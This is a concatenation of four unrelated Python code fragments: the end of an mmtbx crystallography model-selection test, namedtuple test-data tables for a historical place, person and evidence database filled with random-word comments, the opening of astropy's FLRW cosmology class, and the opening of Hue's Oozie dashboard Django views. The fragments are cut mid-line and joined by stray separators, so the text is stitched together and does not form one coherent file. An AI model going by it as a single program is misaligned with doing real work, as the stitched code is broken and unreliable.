hierarchy_out.as_pdb_string(crystal_symmetry=xrs_out))
# Model 5: perfect, but missing CRYST1
open("tst_start_model_5.pdb", "w").write(hierarchy_in.as_pdb_string())
# run method
params = select_best_starting_model.master_phil.extract()
params.rigid_body_refine = False
model_names = [
"tst_start_model_1.pdb",
"tst_start_model_2.pdb",
"tst_start_model_3.pdb",
"tst_start_model_4.pdb",
"tst_start_model_5.pdb",
]
result = select_best_starting_model.select_model(
model_names=model_names,
model_data=None,
f_obs=f_obs,
r_free_flags=flags,
params=params,
skip_twin_detection=True,
log=null_out())
# result.show(verbose=True)
assert (result.best_model_name == "tst_start_model_4.pdb"), result.best_model_name
params.rigid_body_refine = True
result = select_best_starting_model.select_model(
model_names=model_names,
model_data=None,
f_obs=f_obs,
r_free_flags=flags,
params=params,
skip_twin_detection=True,
log=null_out())
# result.show(verbose=True)
assert (result.best_model_name == "tst_start_model_1.pdb"), result.best_model_name
def exercise_misc():
from mmtbx.refinement import select_best_starting_model
from iotbx import file_reader
import iotbx.pdb.hierarchy
pdb_str = """\
REMARK this is a remark record!
CRYST1 21.937 4.866 23.477 90.00 107.08 90.00 P 1 21 1
SCALE1 0.045585 0.000000 0.014006 0.00000
SCALE2 0.000000 0.205508 0.000000 0.00000
SCALE3 0.000000 0.000000 0.044560 0.00000
ATOM 1 N GLY A 1 -9.009 4.612 6.102 0.00 16.77 N
ATOM 2 CA GLY A 1 -9.052 4.207 4.651 0.00 16.57 C
ATOM 3 C GLY A 1 -8.015 3.140 4.419 0.00 16.16 C
ATOM 4 O GLY A 1 -7.523 2.521 5.381 0.00 16.78 O
ATOM 5 H1 GLY A 1 -9.802 4.938 6.343 0.00 16.77 H
ATOM 6 H2 GLY A 1 -8.816 3.902 6.603 0.00 16.77 H
ATOM 7 H3 GLY A 1 -8.385 5.236 6.218 0.00 16.77 H
ATOM 8 HA2 GLY A 1 -9.928 3.856 4.426 0.00 16.57 H
ATOM 9 HA3 GLY A 1 -8.858 4.970 4.084 0.00 16.57 H
ATOM 10 N ASN A 2 -7.656 2.923 3.155 1.00 15.02 N
ATOM 11 CA ASN A 2 -6.522 2.038 2.831 1.00 14.10 C
ATOM 12 C ASN A 2 -5.241 2.537 3.427 1.00 13.13 C
ATOM 13 O ASN A 2 -4.978 3.742 3.426 1.00 11.91 O
ATOM 14 CB ASN A 2 -6.346 1.881 1.341 1.00 15.38 C
ATOM 15 CG ASN A 2 -7.584 1.342 0.692 1.00 14.08 C
ATOM 16 OD1 ASN A 2 -8.025 0.227 1.016 1.00 17.46 O
ATOM 17 ND2 ASN A 2 -8.204 2.155 -0.169 1.00 11.72 N
ATOM 18 H ASN A 2 -8.044 3.269 2.470 1.00 15.02 H
ATOM 19 HA ASN | |
None),
TimeGroup(9, None),
TimeGroup(10, None),
TimeGroup(11, 21),
TimeGroup(12, None),
TimeGroup(13, 22),
TimeGroup(14, None),
TimeGroup(15, None),
TimeGroup(16, None),
TimeGroup(17, 23),
TimeGroup(18, None),
TimeGroup(19, None),
TimeGroup(20, None),
TimeGroup(21, None),
TimeGroup(22, None),
TimeGroup(23, None),
TimeGroup(24, 24),
TimeGroup(25, None),
TimeGroup(26, None),
]
# }}}
TimeInstance = namedtuple('time_instance', ['id', 'time_group_id', 'span', 'confidence', 'comment'])# {{{
time_instance_table = [
TimeInstance(1, 1, '[1679,1784)', 'uncertain', None),
TimeInstance(2, 1, '[626,)', 'certain', None),
TimeInstance(3, 1, '[1640,1850)', 'certain', None),
TimeInstance(4, 1, '[1311,)', 'false', 'workshops mired designated'),
TimeInstance(5, 2, '[,925)', 'false', None),
TimeInstance(6, 2, '[1798,)', None, None),
TimeInstance(7, 2, 'empty', 'contested', None),
TimeInstance(8, 2, '[849,1294)', 'false', None),
TimeInstance(9, 3, '[,1609)', 'contested', None),
TimeInstance(10, 3, '[1277,1493)', 'uncertain', None),
TimeInstance(11, 3, '[1415,1889)', 'uncertain', 'registering temples paragon hawkwind scrapper extractors'),
TimeInstance(12, 3, '[201,1529)', None, 'testdata'),
TimeInstance(13, 4, '[865,1367)', 'false', 'cottage clocker catherin'),
TimeInstance(14, 4, '[1031,1869)', 'contested', None),
TimeInstance(15, 4, '[,1649)', 'uncertain', None),
TimeInstance(16, 4, '[1021,1242)', 'false', None),
TimeInstance(17, 5, '[432,906)', 'certain', None),
TimeInstance(18, 6, '[1666,)', 'certain', None),
TimeInstance(19, 6, '[960,1566)', 'uncertain', 'apparitions jabs methanol accredit deliverable configurable'),
TimeInstance(20, 6, '[1203,1598)', 'uncertain', 'fried eggs'),
TimeInstance(21, 7, '[1598,1680)', 'certain', 'interconnected'),
TimeInstance(22, 7, '[463,1404)', 'false', None),
TimeInstance(23, 7, '[1888,)', 'certain', 'benchmarks'),
TimeInstance(24, 7, '[278,1077)', 'probable', None),
TimeInstance(25, 9, '[825,1851)', 'contested', None),
TimeInstance(26, 9, '[,1257)', 'false', None),
TimeInstance(27, 9, '[,1969)', 'certain', 'receptive cursory'),
TimeInstance(28, 9, '[1122,)', 'uncertain', None),
TimeInstance(29, 10, '[1822,1835)', 'contested', None),
TimeInstance(30, 10, '[905,1106)', None, ''),
TimeInstance(31, 10, '[890,)', 'false', 'sdmf sdg '),
TimeInstance(32, 12, '[1273,1476)', None, 'confirmations delineate filtrate blitzs bizkit shes'),
TimeInstance(33, 12, '[269,684)', 'false', 'prerogatives'),
TimeInstance(34, 13, 'empty', 'false', 'siderite palmed jaws shorting partridges'),
TimeInstance(35, 13, '[,690)', 'probable', 'trappings fittings casteth sheehan software forges delving'),
TimeInstance(36, 13, '[442,596)', 'certain', 'radiochemical invective permit presumptions whitehorse holocene'),
TimeInstance(37, 13, '[1473,1673)', 'certain', 'dried plums'),
TimeInstance(38, 14, '[954,1530)', None, 'beaters downpour reevaluating spangle trundle hes slops'),
TimeInstance(39, 14, '[1391,)', 'contested', None),
TimeInstance(40, 14, '[428,775)', 'probable', None),
TimeInstance(41, 15, '[593,755)', 'contested', 'surroundings merriment roof forbes sermon sported'),
TimeInstance(42, 15, '[1543,)', 'contested', 'trachea evoking flair competitors brainstems victor initialed'),
TimeInstance(43, 15, '[789,1132)', 'contested', None),
TimeInstance(44, 15, '[659,1865)', None, 'property'),
TimeInstance(45, 15, '[1710,)', 'certain', None),
TimeInstance(46, 15, '[1729,)', 'certain', 'idling communicates deify necromancer aqua'),
TimeInstance(47, 21, '[1371,1808)', 'false', 'juan churchyard asymptotes landings winifred flooring'),
TimeInstance(48, 22, '[329,673)', 'probable', None),
TimeInstance(49, 23, '[,1478)', 'contested', None),
TimeInstance(50, 24, '[449,893)', 'uncertain', None),
TimeInstance(51, 25, '[1572,1573)', 'uncertain', None),
]
# }}}
PersonType = namedtuple('person_type', ['id', 'type'])# {{{
person_type_table = [
PersonType(1, 'Person type 1'),
]
# }}}
Person = namedtuple('person', ['id', 'name', 'time_range', 'comment', 'person_type'])# {{{
person_table = [
Person(1, 'Person 1', '', 'comment 1', 1),
Person(2, 'Person 2', '', 'comment 2', 1),
Person(3, 'Person 3', '5th century', 'comment 3', 1),
Person(4, 'Person 4', '519-572', None, 1),
Person(5, 'Person 5', '', 'comment 5', 1),
Person(6, 'Person 6', 'first of his name', 'comment 6', 1),
Person(7, 'Person 6', 'second of his name', None, 1),
Person(8, 'Person 8', '', None, 1),
Person(9, 'Person 9', '14th century', 'comment 9', 1),
Person(10, 'Person 10', 'last decade of the 15th century', 'comment 10', 1),
]
# }}}
PersonInstance = namedtuple('person_instance', ['id', 'person_id', 'annotation_id', 'confidence', 'comment'])# {{{
person_instance_table = [
PersonInstance(1, 1, None, 'probable', 'comment 1'),
PersonInstance(2, 2, None, 'certain', 'comment 2'),
PersonInstance(3, 3, 25, None, 'comment 3'),
PersonInstance(4, 4, None, 'false', None),
PersonInstance(5, 5, 26, None, 'comment 5'),
PersonInstance(6, 6, 27, 'probable', 'comment 6'),
PersonInstance(7, 7, None, 'uncertain', None),
PersonInstance(8, 8, None, 'false', None),
PersonInstance(9, 8, 28, 'contested', 'comment 9'),
PersonInstance(10, 8, None, 'uncertain', 'comment 10'),
PersonInstance(11, 1, None, None, None),
PersonInstance(12, 2, 29, 'probable', 'comment 12'),
PersonInstance(13, 3, None, 'false', 'comment 13'),
PersonInstance(14, 4, None, 'contested', 'comment 14'),
PersonInstance(15, 5, None, 'uncertain', 'comment 15'),
PersonInstance(16, 6, None, None, 'comment 16'),
PersonInstance(17, 7, None, 'probable', None),
PersonInstance(18, 8, 30, 'false', 'comment 18'),
PersonInstance(19, 8, None, 'contested', 'comment 19'),
PersonInstance(20, 1, None, 'probable', 'comment 20'),
PersonInstance(21, 4, 31, None, 'comment 21'),
PersonInstance(22, 5, None, None, None),
PersonInstance(23, 7, None, 'uncertain', 'comment 23'),
PersonInstance(24, 8, None, 'contested', None),
PersonInstance(25, 7, 32, 'uncertain', 'comment 25'),
]
# }}}
Evidence = namedtuple('evidence', ['id', 'place_instance_id', 'time_group_id', 'religion_instance_id', 'person_instance_id', 'interpretation_confidence', 'visible', 'comment'])# {{{
evidence_table = [
Evidence(1, 1, 1, 1, 1, None, True, 'zapper footing slippery blondes'),
Evidence(2, 2, 2, 2, 2, 'contested', True, None),
Evidence(3, 3, 3, 3, 3, 'uncertain', False, 'maidservant amulet postmen'),
Evidence(4, 4, 4, 4, 4, 'contested', True, 'pansys shagbark technologist reinstating airstrips chopped'),
Evidence(5, 5, 5, 5, 5, 'uncertain', True, None),
Evidence(6, 6, 6, 6, 6, None, False, 'speculator scirocco crafts scull dished streamliner unnoticed'),
Evidence(7, 7, 7, 7, 7, 'contested', True, 'sicker smokin graduates herpes patently'),
Evidence(8, 8, 8, 8, 8, 'uncertain', False, 'phialpha redstart divans ethical laidlaw truants'),
Evidence(9, 9, 9, 9, 9, 'false', False, 'reorder ownership weighing averted snuff'),
Evidence(10, 10, 10, 10, 10, None, False, 'biconnected nonspecialists bootlegs perchlorate uncompromising ferreira chinaman'),
Evidence(11, 11, 11, 11, 11, 'probable', False, 'livre wailed tarheel revving attuning'),
Evidence(12, 12, 12, 12, 12, 'certain', False, 'guidebooks fireplaces abscond'),
Evidence(13, 13, 13, 13, 13, None, True, None),
Evidence(14, 14, 14, 14, 14, 'contested', False, 'spaceman gareth secretaries hera'),
Evidence(15, 15, 15, 15, 15, 'false', True, 'missiles antipodes hawker horseflesh'),
Evidence(16, 16, 16, 16, 16, 'uncertain', True, 'anisotropy'),
Evidence(17, 17, 17, 17, 17, 'false', False, None),
Evidence(18, 18, 18, 18, 18, 'contested', True, 'confiscations fleshes phon boron cowry bases'),
Evidence(19, 19, 19, 19, 19, 'contested', False, 'everlastingly reverent worktable stimulants readies leak guyer'),
Evidence(20, 20, 20, 20, 20, 'probable', True, 'fortin anise chattel longitude gayer perpendicular'),
Evidence(21, 1, 1, 1, 1, 'false', False, 'test comment'),
Evidence(22, 1, 2, 2, 3, 'uncertain', False, None),
Evidence(23, 1, 3, 3, 4, 'probable', True, None),
Evidence(24, 1, 4, 4, 5, 'probable', True, 'icicle reformulating shell carob burglar matriculation log feigned'),
Evidence(25, 1, 5, 5, 6, 'contested', True, None),
Evidence(26, 20, 20, 20, 20, 'contested', True, None),
Evidence(27, 20, 20, 20, None, 'contested', True, None),
Evidence(28, 20, None, 20, 20, 'contested', True, None),
Evidence(29, 20, 20, 20, 20, 'contested', True, None),
]
# }}}
Language = namedtuple('language', ['id', 'name'])# {{{
language_table = [
Language(1, 'Language 1'),
Language(2, 'Language 2'),
Language(3, 'Language 3'),
Language(4, 'Language 4'),
Language(5, 'Language 5'),
Language(6, 'Language 6'),
Language(7, 'Language 7'),
Language(8, 'Language 8'),
Language(9, 'Language 9'),
Language(10, 'Language 10'),
Language(11, 'Language 11'),
Language(12, 'Language 12'),
]
# }}}
NameVar = namedtuple('name_var', ['id', 'name', 'transcription', 'simplified', 'main_form', 'comment', 'place_id', 'language_id'])# {{{
name_var_table = [
NameVar(1, 'Unique name 1', None, None, True, 'Testcomment', 1, 1),
NameVar(2, 'zzzz', None, None, True, 'Matches \'z\'', 1, 2),
NameVar(3, 'Unique name 2', None, None, False, None, 2, 3),
NameVar(4, 'Raspberry', None, None, False, 'ends in y', 2, 4),
NameVar(5, 'unique name 3', None, None, True, None, 3, 5),
NameVar(6, 'Raid', None, None, True, None, 3, 6),
NameVar(7, 'match with tee at start of word', None, None, False, None, 3, 7),
NameVar(8, 'Starts with s', None, None, True, None, 4, 1),
NameVar(9, 'raided', None, None, False, None, 4, 2),
NameVar(10, 'Ends with t', None, None, True, None, 5, 3),
NameVar(11, '3LT', None, None, False, None, 6, 4),
NameVar(12, '3l_', None, None, False, None, 7, 5),
NameVar(13, 'graph', None, None, True, None, 7, 6),
NameVar(14, 'Last name', None, None, False, 'For place 8', 8, 7),
NameVar(15, 'primarynamedoesnotmatch', 'unique transcription', None, True, 'Testcomment', 15, 2),
NameVar(16, 'csaAwer2332', 'silly name', 'place, z, Z', True, 'Testcomment', 16, 2),
NameVar(17, 'foobar', None, 'te, et', True, 'Starts or ends with T', 17, 4),
NameVar(18, 'برقة', 'Barqa', 'Barca, Barqa, Barka', True, None, 18, 3),
]
# }}}
SourceType = namedtuple('source_type', ['id', 'name'])# {{{
source_type_table = [
SourceType(1, 'unknown'),
SourceType(2, 'Primary source'),
SourceType(3, 'Literature'),
]
# }}}
Source = namedtuple('source', ['id', 'name', 'source_type_id', 'default_confidence', 'short'])# {{{
source_table = [
Source(1, 'Source 1', 2, None, 'SRC01'),
Source(2, 'Source 2', 2, None, 'SRC02'),
Source(3, 'Source 3', 3, 'contested', 'SRC03'),
Source(4, 'Source 4', 3, 'contested', 'SRC04'),
Source(5, 'Source 5', 3, 'false', 'SRC05'),
Source(6, 'Source 6', 2, None, 'SRC06'),
Source(7, 'Source 7', 2, 'contested', 'SRC07'),
Source(8, 'Source 8', 3, 'certain', 'SRC08'),
Source(9, 'Source 9', 3, None, 'SRC09'),
Source(10, 'Source 10', 2, 'contested', 'SRC10'),
Source(11, 'Source 11', 1, None, 'SRC11'),
Source(12, 'Source 12', | |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import sys
import warnings
from math import sqrt, pi, exp, log, floor
from abc import ABCMeta, abstractmethod
import numpy as np
from .. import constants as const
from ..config import ConfigurationItem
from ..utils.misc import isiterable
from ..utils.exceptions import AstropyUserWarning
from .. import units as u
from . import parameters
# Originally authored by <NAME> (<EMAIL>),
# and modified by <NAME> (<EMAIL>) and <NAME> (<EMAIL>).
# Many of these adapted from Hogg 1999, astro-ph/9905116
# and Linder 2003, PRL 90, 91301
__all__ = ["FLRW", "LambdaCDM", "FlatLambdaCDM", "wCDM", "FlatwCDM",
"Flatw0waCDM", "w0waCDM", "wpwaCDM", "w0wzCDM", "get_current",
"set_current", "WMAP5", "WMAP7", "WMAP9", "Planck13"]
__doctest_requires__ = {'*': ['scipy.integrate']}
# Constants
# Mpc in km
Mpc_km = (1 * u.Mpc).to(u.km)
arcsec_in_radians = 1 / 3600. * pi / 180
arcmin_in_radians = 1 / 60. * pi / 180
# Radiation parameter over c^2 in cgs
a_B_c2 = 4 * const.sigma_sb.cgs.value / const.c.cgs.value ** 3
# Boltzmann constant in eV / K
kB_evK = const.k_B.decompose().to(u.eV / u.K)
DEFAULT_COSMOLOGY = ConfigurationItem(
'default_cosmology', 'no_default',
'The default cosmology to use. Note this is only read on import, '
'so changing this value at runtime has no effect.')
class CosmologyError(Exception):
pass
class Cosmology(object):
""" Placeholder for when a more general Cosmology class is
implemented. """
pass
class FLRW(Cosmology):
""" A class describing an isotropic and homogeneous
(Friedmann-Lemaitre-Robertson-Walker) cosmology.
This is an abstract base class -- you can't instantiate
examples of this class, but must work with one of its
subclasses such as `LambdaCDM` or `wCDM`.
Parameters
----------
H0 : float or scalar astropy.units.Quantity
Hubble constant at z = 0. If a float, must be in [km/sec/Mpc]
Om0 : float
Omega matter: density of non-relativistic matter in units of the
critical density at z=0.
Ode0 : float
Omega dark energy: density of dark energy in units of the critical
density at z=0.
Tcmb0 : float or scalar astropy.units.Quantity
Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725.
Setting this to zero will turn off both photons and neutrinos (even
massive ones)
Neff : float
Effective number of Neutrino species. Default 3.04.
m_nu : astropy.units.Quantity
Mass of each neutrino species. If this is a scalar Quantity, then all
neutrino species are assumed to have that mass. Otherwise, the mass of
each species. The actual number of neutrino species (and hence the
number of elements of m_nu if it is not scalar) must be the floor of
Neff. Usually this means you must provide three neutrino masses unless
you are considering something like a sterile neutrino.
name : str
Optional name for this cosmological object.
Notes
-----
Class instances are static -- you can't change the values
of the parameters. That is, all of the attributes above are
read only.
"""
__metaclass__ = ABCMeta
def __init__(self, H0, Om0, Ode0, Tcmb0=2.725, Neff=3.04,
m_nu=u.Quantity(0.0, u.eV), name=None):
# all densities are in units of the critical density
self._Om0 = float(Om0)
if self._Om0 < 0.0:
raise ValueError("Matter density can not be negative")
self._Ode0 = float(Ode0)
self._Neff = float(Neff)
if self._Neff < 0.0:
raise ValueError("Effective number of neutrinos can "
"not be negative")
self.name = name
# Tcmb may have units
if isinstance(Tcmb0, u.Quantity):
if not Tcmb0.isscalar:
raise ValueError("Tcmb0 is a non-scalar quantity")
self._Tcmb0 = Tcmb0.to(u.K)
else:
self._Tcmb0 = float(Tcmb0) * u.K
# Hubble parameter at z=0, km/s/Mpc
if isinstance(H0, u.Quantity):
if not H0.isscalar:
raise ValueError("H0 is a non-scalar quantity")
self._H0 = H0.to(u.km / u.s / u.Mpc)
else:
self._H0 = float(H0) * u.km / u.s / u.Mpc
# 100 km/s/Mpc * h = H0 (so h is dimensionless)
self._h = self._H0.value / 100.
# Hubble distance
self._hubble_distance = (const.c / self._H0).to(u.Mpc)
# H0 in s^-1
H0_s = self._H0.to(1.0 / u.s)
# Hubble time
self._hubble_time = (1. / H0_s).to(u.Gyr)
# critical density at z=0 (grams per cubic cm)
self._critical_density0 = (3. * H0_s ** 2 /
(8. * pi * const.G.cgs)).cgs
# Load up neutrino masses.
self._nneutrinos = floor(self._Neff)
# We are going to share Neff between the neutrinos equally.
# In detail this is not correct, but it is a standard assumption
# because propertly calculating it is a) complicated b) depends
# on the details of the massive nuetrinos (e.g., their weak
# interactions, which could be unusual if one is considering sterile
# neutrinos)
self._massivenu = False
if self._nneutrinos > 0 and self._Tcmb0.value > 0:
self._neff_per_nu = self._Neff / self._nneutrinos
if not isinstance(m_nu, u.Quantity):
raise ValueError("m_nu must be a Quantity")
m_nu = m_nu.to(u.eV, equivalencies=u.mass_energy())
# Now, figure out if we have massive neutrinos to deal with,
# and, if so, get the right number of masses
# It is worth the effort to keep track of massless ones seperately
# (since they are quite easy to deal with, and a common use case
# is to set only one neutrino to have mass)
if m_nu.isscalar:
# Assume all neutrinos have the same mass
if m_nu.value == 0:
self._nmasslessnu = self._nneutrinos
self._nmassivenu = 0
else:
self._massivenu = True
self._nmasslessnu = 0
self._nmassivenu = self._nneutrinos
self._massivenu_mass = (m_nu.value *
np.ones(self._nneutrinos))
else:
# Make sure we have the right number of masses
# -unless- they are massless, in which case we cheat a little
if m_nu.value.min() < 0:
raise ValueError("Invalid (negative) neutrino mass"
" encountered")
if m_nu.value.max() == 0:
self._nmasslessnu = self._nneutrinos
self._nmassivenu = 0
else:
self._massivenu = True
if len(m_nu) != self._nneutrinos:
raise ValueError("Unexpected number of neutrino masses")
# Segregate out the massless ones
try:
# Numpy < 1.6 doesn't have count_nonzero
self._nmasslessnu = np.count_nonzero(m_nu.value == 0)
except AttributeError:
self._nmasslessnu = len(np.nonzero(m_nu.value == 0)[0])
self._nmassivenu = self._nneutrinos - self._nmasslessnu
w = np.nonzero(m_nu.value > 0)[0]
self._massivenu_mass = m_nu[w]
# Compute photon density, Tcmb, neutrino parameters
# Tcmb0=0 removes both photons and neutrinos, is handled
# as a special case for efficiency
if self._Tcmb0.value > 0:
# Compute photon density from Tcmb
self._Ogamma0 = a_B_c2 * self._Tcmb0.value ** 4 /\
self._critical_density0.value
# Compute Neutrino temperature
# The constant in front is (4/11)^1/3 -- see any
# cosmology book for an explanation -- for example,
# Weinberg 'Cosmology' p 154 eq (3.1.21)
self._Tnu0 = 0.7137658555036082 * self._Tcmb0
# Compute Neutrino Omega and total relativistic component
# for massive neutrinos
if self._massivenu:
nu_y = self._massivenu_mass / (kB_evK * self._Tnu0)
self._nu_y = nu_y.value
self._Onu0 = self._Ogamma0 * self.nu_relative_density(0)
else:
# This case is particularly simple, so do it directly
# The 0.2271... is 7/8 (4/11)^(4/3) -- the temperature
# bit ^4 (blackbody energy density) times 7/8 for
# FD vs. BE statistics.
self._Onu0 = 0.22710731766 * self._Neff * self._Ogamma0
else:
self._Ogamma0 = 0.0
self._Tnu0 = u.Quantity(0.0, u.K)
self._Onu0 = 0.0
# Compute curvature density
self._Ok0 = 1.0 - self._Om0 - self._Ode0 - self._Ogamma0 - self._Onu0
def _namelead(self):
""" Helper function for constructing __repr__"""
if self.name is None:
return "{0:s}(".format(self.__class__.__name__)
else:
return "{0:s}(name=\"{1:s}\", ".format(self.__class__.__name__,
self.name)
def __repr__(self):
retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, "\
"Tcmb0={4:.4g}, Neff={5:.3g}, m_nu={6:s})"
return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0,
self._Tcmb0, self._Neff, self.m_nu)
# Set up a set of properties for H0, Om0, Ode0, Ok0, etc. for user access.
# Note that we don't let these be set (so, obj.Om0 = value fails)
@property
def H0(self):
""" Return the Hubble constant as an astropy.units.Quantity at z=0"""
return self._H0
@property
def Om0(self):
""" Omega matter; matter density/critical density at z=0"""
return self._Om0
@property
def Ode0(self):
""" Omega dark energy; dark energy density/critical density at z=0"""
return self._Ode0
@property
def Ok0(self):
""" Omega curvature; the effective curvature density/critical density
at z=0"""
return self._Ok0
@property
def Tcmb0(self):
""" Temperature of the CMB as astropy.units.Quantity at z=0"""
return self._Tcmb0
@property
def Tnu0(self):
""" Temperature of the neutrino background as astropy.units.Quantity at z=0"""
return self._Tnu0
@property
def Neff(self):
""" Number of effective neutrino species"""
return self._Neff
@property
def has_massive_nu(self):
""" Does this cosmology have at least one massive neutrino species?"""
if self._Tnu0.value == 0:
return False
return self._massivenu
@property
def m_nu(self):
""" Mass of neutrino species"""
if self._Tnu0.value == 0:
return None
if not self._massivenu:
| |
<gh_stars>0
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import re
import time
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.utils.functional import wraps
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from desktop.lib.django_util import render, encode_json_for_js
from desktop.lib.exceptions_renderable import PopupException
from desktop.lib.i18n import smart_str
from desktop.lib.rest.http_client import RestException
from desktop.lib.view_util import format_duration_in_millis
from desktop.log.access import access_warn
from liboozie.oozie_api import get_oozie
from liboozie.submittion import Submission
from oozie.conf import OOZIE_JOBS_COUNT
from oozie.forms import RerunForm, ParameterForm, RerunCoordForm,\
RerunBundleForm
from oozie.models import History, Job, Workflow, utc_datetime_format, Bundle,\
Coordinator, get_link
from oozie.settings import DJANGO_APPS
LOG = logging.getLogger(__name__)
MAX_COORD_ACTIONS = 250
"""
Permissions:
A Workflow/Coordinator/Bundle can:
* be accessed only by its owner or a superuser or by a user with 'dashboard_jobs_access' permissions
* be submitted/modified only by its owner or a superuser
Permissions checking happens by calling:
* check_job_access_permission()
* check_job_edition_permission()
"""
def manage_oozie_jobs(request, job_id, action):
if request.method != 'POST':
raise PopupException(_('Use a POST request to manage an Oozie job.'))
job = check_job_access_permission(request, job_id)
check_job_edition_permission(job, request.user)
response = {'status': -1, 'data': ''}
try:
response['data'] = get_oozie(request.user).job_control(job_id, action)
response['status'] = 0
if 'notification' in request.POST:
request.info(_(request.POST.get('notification')))
except RestException, ex:
response['data'] = _("Error performing %s on Oozie job %s: %s.") % (action, job_id, ex.message)
return HttpResponse(json.dumps(response), mimetype="application/json")
def show_oozie_error(view_func):
def decorate(request, *args, **kwargs):
try:
return view_func(request, *args, **kwargs)
except RestException, ex:
detail = ex._headers.get('oozie-error-message', ex)
if 'Max retries exceeded with url' in str(detail):
detail = '%s: %s' % (_('The Oozie server is not running'), detail)
raise PopupException(_('An error occurred with Oozie.'), detail=detail)
return wraps(view_func)(decorate)
@show_oozie_error
def list_oozie_workflows(request):
kwargs = {'cnt': OOZIE_JOBS_COUNT.get(),}
if not has_dashboard_jobs_access(request.user):
kwargs['user'] = request.user.username
workflows = get_oozie(request.user).get_workflows(**kwargs)
if request.GET.get('format') == 'json':
json_jobs = workflows.jobs
just_sla = request.GET.get('justsla') == 'true'
if request.GET.get('type') == 'running':
json_jobs = split_oozie_jobs(request.user, workflows.jobs)['running_jobs']
if request.GET.get('type') == 'completed':
json_jobs = split_oozie_jobs(request.user, workflows.jobs)['completed_jobs']
return HttpResponse(encode_json_for_js(massaged_oozie_jobs_for_json(json_jobs, request.user, just_sla)), mimetype="application/json")
return render('dashboard/list_oozie_workflows.mako', request, {
'user': request.user,
'jobs': split_oozie_jobs(request.user, workflows.jobs),
'has_job_edition_permission': has_job_edition_permission,
})
@show_oozie_error
def list_oozie_coordinators(request):
kwargs = {'cnt': OOZIE_JOBS_COUNT.get(),}
if not has_dashboard_jobs_access(request.user):
kwargs['user'] = request.user.username
coordinators = get_oozie(request.user).get_coordinators(**kwargs)
if request.GET.get('format') == 'json':
json_jobs = coordinators.jobs
if request.GET.get('type') == 'running':
json_jobs = split_oozie_jobs(request.user, coordinators.jobs)['running_jobs']
if request.GET.get('type') == 'completed':
json_jobs = split_oozie_jobs(request.user, coordinators.jobs)['completed_jobs']
return HttpResponse(json.dumps(massaged_oozie_jobs_for_json(json_jobs, request.user)).replace('\\\\', '\\'), mimetype="application/json")
return render('dashboard/list_oozie_coordinators.mako', request, {
'jobs': split_oozie_jobs(request.user, coordinators.jobs),
'has_job_edition_permission': has_job_edition_permission,
})
@show_oozie_error
def list_oozie_bundles(request):
kwargs = {'cnt': OOZIE_JOBS_COUNT.get(),}
if not has_dashboard_jobs_access(request.user):
kwargs['user'] = request.user.username
bundles = get_oozie(request.user).get_bundles(**kwargs)
if request.GET.get('format') == 'json':
json_jobs = bundles.jobs
if request.GET.get('type') == 'running':
json_jobs = split_oozie_jobs(request.user, bundles.jobs)['running_jobs']
if request.GET.get('type') == 'completed':
json_jobs = split_oozie_jobs(request.user, bundles.jobs)['completed_jobs']
return HttpResponse(json.dumps(massaged_oozie_jobs_for_json(json_jobs, request.user)).replace('\\\\', '\\'), mimetype="application/json")
return render('dashboard/list_oozie_bundles.mako', request, {
'jobs': split_oozie_jobs(request.user, bundles.jobs),
'has_job_edition_permission': has_job_edition_permission,
})
@show_oozie_error
def list_oozie_workflow(request, job_id):
oozie_workflow = check_job_access_permission(request, job_id)
oozie_coordinator = None
if request.GET.get('coordinator_job_id'):
oozie_coordinator = check_job_access_permission(request, request.GET.get('coordinator_job_id'))
oozie_bundle = None
if request.GET.get('bundle_job_id'):
oozie_bundle = check_job_access_permission(request, request.GET.get('bundle_job_id'))
if oozie_coordinator is not None:
setattr(oozie_workflow, 'oozie_coordinator', oozie_coordinator)
if oozie_bundle is not None:
setattr(oozie_workflow, 'oozie_bundle', oozie_bundle)
history = History.cross_reference_submission_history(request.user, job_id)
hue_coord = history and history.get_coordinator() or History.get_coordinator_from_config(oozie_workflow.conf_dict)
hue_workflow = (hue_coord and hue_coord.workflow) or (history and history.get_workflow()) or History.get_workflow_from_config(oozie_workflow.conf_dict)
if hue_coord and hue_coord.workflow: Job.objects.can_read_or_exception(request, hue_coord.workflow.id)
if hue_workflow: Job.objects.can_read_or_exception(request, hue_workflow.id)
parameters = oozie_workflow.conf_dict.copy()
for action in oozie_workflow.actions:
action.oozie_coordinator = oozie_coordinator
action.oozie_bundle = oozie_bundle
if hue_workflow:
workflow_graph = hue_workflow.gen_status_graph(oozie_workflow)
full_node_list = hue_workflow.node_list
else:
workflow_graph, full_node_list = Workflow.gen_status_graph_from_xml(request.user, oozie_workflow)
if request.GET.get('format') == 'json':
return_obj = {
'id': oozie_workflow.id,
'status': oozie_workflow.status,
'progress': oozie_workflow.get_progress(full_node_list),
'graph': workflow_graph,
'log': oozie_workflow.log,
'actions': massaged_workflow_actions_for_json(oozie_workflow.get_working_actions(), oozie_coordinator, oozie_bundle)
}
return HttpResponse(encode_json_for_js(return_obj), mimetype="application/json")
oozie_slas = []
if oozie_workflow.has_sla:
api = get_oozie(request.user, api_version="v2")
params = {
'id': oozie_workflow.id,
'parent_id': oozie_workflow.id
}
oozie_slas = api.get_oozie_slas(**params)
return render('dashboard/list_oozie_workflow.mako', request, {
'history': history,
'oozie_workflow': oozie_workflow,
'oozie_coordinator': oozie_coordinator,
'oozie_bundle': oozie_bundle,
'oozie_slas': oozie_slas,
'hue_workflow': hue_workflow,
'hue_coord': hue_coord,
'parameters': parameters,
'has_job_edition_permission': has_job_edition_permission,
'workflow_graph': workflow_graph
})
@show_oozie_error
def list_oozie_coordinator(request, job_id):
oozie_coordinator = check_job_access_permission(request, job_id)
# Cross reference the submission history (if any)
coordinator = None
try:
